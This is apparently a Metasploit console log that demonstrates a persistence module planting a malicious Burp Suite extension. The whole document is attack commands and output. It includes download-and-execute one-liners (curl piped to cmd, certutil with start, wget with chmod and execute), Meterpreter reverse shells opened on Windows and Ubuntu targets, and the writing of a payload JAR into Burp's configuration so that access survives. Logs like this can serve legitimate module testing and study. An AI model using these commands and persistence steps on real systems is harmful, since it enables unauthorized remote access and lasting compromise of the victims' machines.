Burp Extension

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /VIFzePGTMLa1dcpTvMRQBg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55729) at 2026-01-16 05:24:25 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 2
target => 2
msf exploit(multi/persistence/burp_extension) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9812
lport => 9812
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/v3fXAwPgMBDCL44G1aW0KQ %TEMP%\CYdTYFAds.exe & start /B %TEMP%\CYdTYFAds.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) > 
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /v3fXAwPgMBDCL44G1aW0KQ
[*] Started reverse TCP handler on 1.1.1.1:9812 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: BuIwiN
[*] Creating JAR file
[*] Writing malicious extension to disk: c:\users\windows\desktop\BuIwiN.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116054809_default_2.2.2.2_burp.config.json_765439.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.4809/WIN10PROLICENSE_20260116.4809.rc

[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9812 -> 2.2.2.2:55876) at 2026-01-16 05:49:34 -0500

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55900) at 2026-01-16 05:53:50 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9815
lport => 9815
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) > 
[*] Started reverse TCP handler on 1.1.1.1:9815 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: IoWH
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-127808-hkcygo
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
Starting a Gradle Daemon (subsequent builds will be faster)

:clean UP-TO-DATE

:compileJava

:processResources

:classes

:jar

:assemble

:compileTestJava NO-SOURCE

:processTestResources NO-SOURCE

:testClasses UP-TO-DATE

:test NO-SOURCE

:check UP-TO-DATE

:build



BUILD SUCCESSFUL in 7s

4 actionable tasks: 3 executed, 1 up-to-date

[+] Successfully built the jar file /tmp/d20260116-127808-hkcygo/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: c:\users\windows\desktop\IoWH.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116060148_default_2.2.2.2_burp.config.json_518370.bin

[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.0148/WIN10PROLICENSE_20260116.0148.rc
[*] Sending stage (58073 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9815 -> 2.2.2.2:56020) at 2026-01-16 06:14:57 -0500

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO wThmilCQ --no-check-certificate http://1.1.1.1:8082/l; chmod +x wThmilCQ; ./wThmilCQ& disown
msf exploit(multi/script/web_delivery) > 
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:43276) at 2026-01-16 06:31:49 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer     : 3.3.3.3
OS           : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 1
target => 1
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9816
lport => 9816
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:9816 
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: KdqJR
[*] Creating JAR file
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//KdqJR.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116073105_default_3.3.3.3_burp.config.json_225090.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.3105/3.3.3.3_20260116.3105.rc

[*] Sending stage (23404 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9816 -> 3.3.3.3:59798) at 2026-01-16 07:45:08 -0500

msf exploit(multi/persistence/burp_extension) > 

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO z9hg2BUt --no-check-certificate http://1.1.1.1:8082/l; chmod +x z9hg2BUt; ./z9hg2BUt& disown
msf exploit(multi/script/web_delivery) > 
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:59534) at 2026-01-16 07:54:07 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer     : 3.3.3.3
OS           : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9817
lport => 9817
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:9817 
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: YBFkQz
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-130356-yxz2cv
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
:clean UP-TO-DATE

:compileJava

:processResources

:classes

:jar

:assemble

:compileTestJava NO-SOURCE

:processTestResources NO-SOURCE

:testClasses UP-TO-DATE

:test NO-SOURCE

:check UP-TO-DATE

:build



BUILD SUCCESSFUL in 1s

4 actionable tasks: 3 executed, 1 up-to-date

[+] Successfully built the jar file /tmp/d20260116-130356-yxz2cv/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//YBFkQz.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116075456_default_3.3.3.3_burp.config.json_053290.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.5456/3.3.3.3_20260116.5456.rc

[*] Sending stage (58073 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9817 -> 3.3.3.3:52712) at 2026-01-16 07:55:28 -0500